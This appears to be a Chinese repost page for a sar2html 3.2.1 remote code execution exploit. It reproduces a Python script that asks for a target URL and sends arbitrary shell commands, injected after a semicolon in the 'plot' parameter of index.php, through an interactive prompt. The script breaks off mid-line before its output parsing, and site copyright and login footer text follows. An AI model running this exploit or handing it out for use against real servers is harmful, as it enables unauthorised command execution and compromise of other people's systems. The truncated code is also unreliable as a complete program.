# Sar2html 3.2.1 遠程代碼執行漏洞
==EXP==
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution # Date: 27-12-2020 # Exploit Author: Musyoka Ian # Vendor Homepage:https://github.com/cemtan/sar2html # Software Link: https://sourceforge.net/projects/sar2html/ # Version: 3.2.1 # Tested on: Ubuntu 18.04.1 #!/usr/bin/env python3 import requests import re from cmd import Cmd url = input("Enter The url => ") class Terminal(Cmd): prompt = "Command => " def default(self, args): exploiter(args) def exploiter(cmd): global url sess = requests.session() output = sess.get(f"{url}/index.php?plot=;{cmd}") try: out = re.findall("
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容